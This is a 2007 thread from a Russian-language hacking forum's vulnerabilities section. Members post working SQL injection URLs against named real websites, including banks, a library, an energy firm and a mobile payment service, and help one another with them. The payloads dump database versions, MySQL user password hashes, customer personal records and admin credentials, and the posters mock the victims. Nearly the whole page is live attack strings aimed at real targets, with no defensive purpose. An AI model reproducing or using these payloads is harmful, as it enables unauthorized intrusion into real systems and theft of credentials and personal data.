HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1941  
Старый 16.04.2007, 20:49
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

хаха еще один банк
Код:
http://www.cashservice.ru/index.php?part=transfer&action=point&id=700%20union%20select%20version(),database(),version(),4/*

Последний раз редактировалось kair; 16.04.2007 в 21:05..
 
Ответить с цитированием

  #1942  
Старый 16.04.2007, 21:04
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

наслаждаемся rooтом
Код:
http://www.747.ru/board/main/show/?id=700%20union%20select%201,2,user,password,5,6,7,8,9,10%20from%20mysql.user/*
 
Ответить с цитированием

  #1943  
Старый 16.04.2007, 22:05
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

Код:
http://www.luontais.info/luontais.pmd/foorumi/haastattelu?id=-7+union+select+1,2,3,user(),version(),database(),7,8/*
Есть таблица users, но не смог вывести из неё колонки =\
 
Ответить с цитированием

  #1944  
Старый 16.04.2007, 22:33
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

Какието услуги по созданию сайтов =\

Цитата:
http://www.media-r.ru/print.php?id_new=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17/*
 
Ответить с цитированием

  #1945  
Старый 16.04.2007, 22:48
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

Бавлинская централизованная библиотечная система

Код:
http://www.bavly-cbs.ru/news.php?id_new=-28+union+select+1,concat(user(),char(58),version(),char(58),database()),3/*
 
Ответить с цитированием

  #1946  
Старый 16.04.2007, 22:58
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

http://www.altaienergo.ru/show_new.php?id_new=-1533+union+select+1,2,3,4,5,6,7,8,9,10+from+mysql. user/*

Кто поможет вывести даные, дам +8 !
 
Ответить с цитированием

  #1947  
Старый 16.04.2007, 23:26
big_BRAT
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655

Репутация: 168
Отправить сообщение для big_BRAT с помощью ICQ
По умолчанию

Цитата:
Сообщение от zl0ba  
http://www.altaienergo.ru/show_new.php?id_new=-1533+union+select+1,2,3,4,5,6,7,8,9,10+from+mysql. user/*

Кто поможет вывести даные, дам +8 !
если правильно понял
http://www.altaienergo.ru/show_new.php?id_new=-1533+union+select+1,2,3,4,concat(password,char(58) ,user),6,7,8,9,10+from+mysql.user+limit+0,1/*
вывод в картинке и в титле
 
Ответить с цитированием

  #1948  
Старый 16.04.2007, 23:29
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

zl0ba, ещё так
Цитата:
http://www.altaienergo.ru/show_new.php?id_new=-1533+union+select+1,AES_DECRYPT(AES_ENCRYPT(user,0 x71),0x71),3,AES_DECRYPT(AES_ENCRYPT(password,0x71 ),0x71),5,6,7,8,9,10+from+mysql.user/*
 
Ответить с цитированием

  #1949  
Старый 16.04.2007, 23:46
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

www.tdahp.ru
Код:
http://www.tdahp.ru/ru/zayavka/index.html?id_tovar=-2+union+select+concat(version(),char(58,58),database(),char(58,58),user()),2/*
www.studygerman.ru
Код:
http://www.studygerman.ru/test/test.php?id=-1+union+select+1,2,convert(concat(version(),char(58,58),database(),char(58,58),user())+using+cp1251),4,5,6,7,8,9/*
www.impactsoft.ru
Код:
http://www.impactsoft.ru/eng/clients.php?razdel_id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(version(),char(58,58),database(),char(58,58),user()),0x71),0x71),3,4,5,6/*
www.icie.ru
Код:
http://www.icie.ru/press-centre/foto/?id=-4+union+select+concat(version(),char(58,58),database(),char(58,58),user())/*
www.sacr.sk
Код:
http://www.sacr.sk/category2?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,concat(version(),char(58,58),database(),char(58,58),user()),12,13,14,15,16,7,18,19,20,21,22/*&lang=ru

www.chelsi.ru
Код:
http://www.chelsi.ru/comment.php?idart=-11364+union+select+1,2,3,4,5,concat(version(),char(58,58),database(),char(58,58),user())/*
 
Ответить с цитированием

  #1950  
Старый 17.04.2007, 00:04
big_BRAT
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655

Репутация: 168
Отправить сообщение для big_BRAT с помощью ICQ
По умолчанию

www.telme.sg аналог скайпа, только заточен под моб. тел., с сайта можно управлять счётом, переводить деньги можно только на банковский счёт /обманули, писали что можно и на вебмани /
пользователей 50 тис., перебор через лимит. может комуто и пригодится

Цитата:
http://www1.telme.sg/page1.php?curr=page1&lang=eng&sub=com&subm=2&ses=3 969+union+select+1,2,column_name+from+information_ schema.columns+where+table_name=0x7573657273+limit +65,1/*
Цитата:
http://www1.telme.sg/page1.php?curr=page1&lang=eng&sub=com&subm=2&ses=3 969+union+select+1,2,concat_ws(char(58),id,nicknam e,webname,firstname,lastname,street,city,state,pos tcode,country,phone,mobile,fax,email,birth_d,birth _m,birth_y,title,upd,pwd,cell_id,presented,forced, package,credit,vaucher,datas,fastbonus,pickup,pick upzone,actadsl,idadsl,adsltime,lastadslcardid,last adslcarddate,autologindesk,lang,hiddenstatus,start upautoconf,pars5pos,pars5neg,pars5dist,assistant,r egdate,actdate,boosterc,gparsed,visite,lastlog,loc alizzazione,gruppo,abilita,foto,qualifica,titolo,c ommissionabile,codicedistributore,idpacchetto,idat tivazione,metodopagamento,nomeadmin,cognomeadmin,c odfiscadmin,viaadmin,cittaadmin,capadmin)+from+use rs+limit+11111,1/*
админку не нашёл, но таблица есть

Цитата:
http://www1.telme.sg/page1.php?curr=page1&lang=eng&sub=com&subm=2&ses=3 969+union+select+1,2,concat(username,char(58),pass word)+from+admin+limit+0,1/*
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ